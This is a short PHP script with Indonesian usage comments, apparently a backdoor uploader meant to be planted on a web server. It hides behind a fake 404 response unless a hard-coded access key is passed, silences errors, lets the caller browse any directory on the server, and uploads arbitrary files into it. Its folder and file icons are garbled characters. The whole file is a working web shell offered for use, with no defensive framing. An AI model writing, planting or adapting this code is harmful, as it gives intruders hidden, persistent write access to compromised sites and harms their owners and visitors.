<?php

//cara pakai
//site.com/file.php?k=123

error_reporting(0);

/* === ACCESS KEY === */
$KEY = '123'; // ganti sesuai keinginan
if (($_GET['k'] ?? '') !== $KEY) {
    http_response_code(404);
    exit;
}
/* ================== */

/* === DIRECTORY AKTIF === */
$dir = realpath($_GET['d'] ?? __DIR__);
if (!$dir || !is_dir($dir)) exit;

/* === UPLOAD FILE === */
if (isset($_FILES['u'])) {
    $name = basename($_FILES['u']['name']);
    $tmp  = $_FILES['u']['tmp_name'];

    if ($name && is_uploaded_file($tmp)) {
        move_uploaded_file($tmp, $dir.'/'.$name);
        echo "<b>UPLOAD OK: $name</b><br><br>";
    }
}
?>

<form method="post" enctype="multipart/form-data">
<input type="file" name="u">
<button>UPLOAD</button>
</form>

<h3>Path Folder Aktif:</h3>
<p style="color:#0f0;"><?=htmlspecialchars($dir)?></p>

<h3>Daftar File di Folder Ini:</h3>
<?php
$files = scandir($dir);
foreach($files as $f){
    if($f === '.' || $f === '..') continue;
    $p = $dir.'/'.$f;
    echo is_dir($p)
        ? "=¡ <a href='?k=$KEY&d=".realpath($p)."'>$f</a><br>"
        : "=ƒ $f<br>";
}
?>
